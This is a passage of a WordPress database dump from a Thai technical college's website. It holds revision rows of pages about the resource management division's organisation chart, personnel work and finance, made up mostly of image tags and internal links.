/></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 15:15:49', '2018-03-06 08:15:49', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1530, 3, '2018-03-06 15:16:51', '2018-03-06 08:16:51', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 15:16:51', '2018-03-06 08:16:51', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1531, 3, '2018-03-06 15:18:13', '2018-03-06 08:18:13', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"/คำสั่งแต่งตั้ง-2468-2560\">คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </a></span><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"/คำสั่งแต่งตั้ง-2468-2560\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ</a> </span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:18:13', '2018-03-06 08:18:13', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1532, 3, '2018-03-06 15:18:54', '2018-03-06 08:18:54', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #339966;\">**<a style=\"color: #339966;\" href=\"/คำสั่งแต่งตั้ง-2468-2560\">คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </a></span><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"/คำสั่งแต่งตั้ง-2468-2560\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ</a> </span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:18:54', '2018-03-06 08:18:54', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1533, 3, '2018-03-06 15:22:05', '2018-03-06 08:22:05', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:22:05', '2018-03-06 08:22:05', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1534, 3, '2018-03-06 15:23:22', '2018-03-06 08:23:22', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:23:22', '2018-03-06 08:23:22', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1535, 3, '2018-03-06 15:24:24', '2018-03-06 08:24:24', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:24:24', '2018-03-06 08:24:24', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1536, 3, '2018-03-06 15:35:00', '2018-03-06 08:35:00', ' \r\n\r\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/Picture1-1.png\"><img class=\"aligncenter wp-image-4816\" src=\"/wp-content/uploads/2018/12/Picture1-1.png\" alt=\"\" width=\"353\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" />', 'งานการเงิน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%87%e0%b8%b4%e0%b8%99', '', '', '2018-12-24 15:21:11', '2018-12-24 08:21:11', '', 0, 'http://www.technicrayong.ac.th/?page_id=1536', 0, 'page', '', 0),
(1537, 3, '2018-03-06 15:35:00', '2018-03-06 08:35:00', '<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"385\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />', 'งานการเงิน', '', 'inherit', 'closed', 'closed', '', '1536-revision-v1', '', '', '2018-03-06 15:35:00', '2018-03-06 08:35:00', '', 1536, 'http://www.technicrayong.ac.th/1536-revision-v1/', 0, 'revision', '', 0),
(1538, 3, '2018-12-24 15:20:47', '2018-12-24 08:20:47', ' \n\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\n\n \n\n<img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" />', 'งานการเงิน', '', 'inherit', 'closed', 'closed', '', '1536-autosave-v1', '', '', '2018-12-24 15:20:47', '2018-12-24 08:20:47', '', 1536, 'http://www.technicrayong.ac.th/1536-autosave-v1/', 0, 'revision', '', 0),
(1539, 3, '2018-03-06 15:36:24', '2018-03-06 08:36:24', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 15:36:24', '2018-03-06 08:36:24', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1540, 3, '2018-03-06 15:36:57', '2018-03-06 08:36:57', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" 